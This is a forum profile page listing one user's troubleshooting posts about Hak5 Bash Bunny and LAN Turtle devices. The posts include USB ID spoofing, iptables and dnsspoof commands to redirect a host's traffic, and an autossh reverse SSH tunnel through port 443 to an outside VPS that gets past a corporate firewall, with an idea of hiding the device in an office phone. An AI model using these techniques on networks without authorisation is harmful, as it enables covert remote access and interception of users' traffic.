Jump to content

kanalia

Active Members
  • Content Count

    17
  • Joined

  • Last visited

About kanalia

  • Rank
    Hak5 Fan

Recent Profile Visitors

560 profile views
  1. Hi Gents I tried to assign a random hex to variables but this does not seem to work: VID=var="VID_0X"$(printf "%04X" $RANDOM) PID=var="PID_0X"$(printf "%04X" $RANDOM) ATTACKMODE RNDIS_ETHERNET $VID $PID I need to find the script that executes the payload. Maybe the variables are not resolved. Any suggestions? regards
  2. Hi Bunny hoppers The Bunny works on the principle that hosts detect it as 2Gb Ethernet. It then takes precedence over other networks. I noticed that if plugged in for the first time it works every time. If connected more than one time it sometimes detects with speed of 0 (images attached) which makes Bunny useless. Has anyone else experienced this? If I uninstall the driver and plug in again it will detect as 2Gb.
  3. Works like a charm if Bunny detects as 2Gb adapter (takes precedence over host's NIC) https://github.com/pojebus/bashbunny-payloads/tree/master/payloads/library/dns_spoofer
  4. I figured it out, the interface must be specified when using dnsspoof. regards
  5. I also tried to achieve this by spoofing dns: Enable port forwarding echo 1 > /proc/sys/net/ipv4/ip_forward Configure iptables to forward udp traffic on port 53 iptables -t nat -A PREROUTING -i usb0 -p udp --destination-port 53 -j REDIRECT --to-port 53 Create hosts file - nano hosts, create entry 172.16.64.1 * Run dnsspoof dnsspoof -f hosts No luck either. Any help much appreciated. regards, Mike
  6. Hi Folks Just wonder if it would be possible to redirect all the host traffic to apache server running on bunny. I have installed apache and can browse it from host. I enabled port forwarding: echo "1" > /proc/sys/net/ipv4/ip_forward and added following iptables rules: iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.64.1:80 iptables -t nat -A POSTROUTING -j MASQUERADE Please excuse if I am doing something silly. I am a newbie. regards, Mike
  7. Right folks, I do not know if this is coincedence but it works every time if i change the syntax on VPS. My pc at work is behind firewall so I can reverse ssh to my VPS only through port 80 or 443. I have changed the ssh settings (etc/config/autossh) to: option ssh '-i /root/.ssh/id_rsa -N -T -R 2222:localhost:22 turtlessh@X.X.X.X -p 443' and then on my VPS: ssh -p 2222 root@localhost This works every time. Previosly i called ssh root@localhost -p 2222 which intermitently connected to turtle but most of the time it thrown a 'Connection refused' error. Please give this
  8. Hi, Can you please kindly explain the following settings: option gatetime '0' option monitorport '20000' option poll '600' taken from etc\config\autossh. I have a problem with autossh. When I plug my turtle with Ethernet cable already attached it won't work. I need to wait for the orange light to stop blinking, then attach the Ethernet cable, autossh works like a charm then. I thought that if I could delay executing the ssh command maybe it would work with Ethernet cable attached as well. I was going to embed the turtle in IP office phone, where turtle pin
  9. Has anyone found a cure to this problem? I am experiencing this too. If i plug my turtle into computer with Ethernet cable attached it wont autossh. I have to plug it in, wait for the orange light to stop blinking then attach Ethernet cable. Also can anyone explain the settings from autossh config file: option gatetime '0' option monitorport '20000' option poll '600' much appreciated, kanalia
  10. Thanks, I watched the movie and made some changes but did not resolve it. Can you by any chance have a quick peek at my config and maybe you will be able to spot what's wrong. I am losing the plot. Turtle networks (I bridged both NIC's so both are allocated IP by DHCP): Turtle network configuration: Turtle's firewall configuration: Laptop's network (second client connected to VPN server): OpenVPN server config: To all clever people (clearly I do not belong to this group :) ), any help would by much appreciated. Regards
  11. Hi clever people! I have recently watched Darren's clip on how to configure my turtle with OpenVPN server. I created a VPS in the cloud, installed VPN server and configured users as per tutorial. Both users can now connect to VPN server but I can only ping turtle form my laptop. The network the turtle is on is not accessible. Clearly I am missing something. Any help would be much appreciated. Best regards
  12. This is now resolved. Go to etc/config/network and change the config for 'lan' to: config interface 'lan' option ifname 'eth0 eth1' option type 'bridge' option proto 'dhcp' Both interfaces are assigned an ip by DHCP.
  13. Hi Chaps I have just created a virtual server on azure. The corporate network's firewall blocks port 22 so I added an endpoint which translate port 443 to 22 - great! I can now ssh to my server. I have created a key pair and copied it to the server via turtle. I went to autossh configuration screen and am a bit puzzled. How should I configure it if the only ports that are not blocked are 80 and 443?? regards
  14. Hi Chaps I have figured it out myself. Simply go to etc/config/network and change the config for 'lan' to: config interface 'lan' option ifname 'eth0 eth1' option type 'bridge' option proto 'dhcp' This bridge will make both adapters visible to target network so both adapters will be allocated an IP by DHCP. Have fun!!
  15. Hi Chaps I posted this question before but I am going to go into details a bit more this time. This is the current config of the device: config interface 'loopback' option ifname 'lo' option proto 'static' option ipaddr '127.0.0.1' option netmask '255.0.0.0' config globals 'globals' option ula_prefix 'fda4:1103:3ec4::/48' config interface 'lan' option ifname 'eth0' option force_link '1' option type 'bridge' option proto 'static' option ipaddr '172.16.84.1' option netmask '255.255.255.0' option ip6assign '60' config interface 'wan' option ifname
×
×
  • Create New...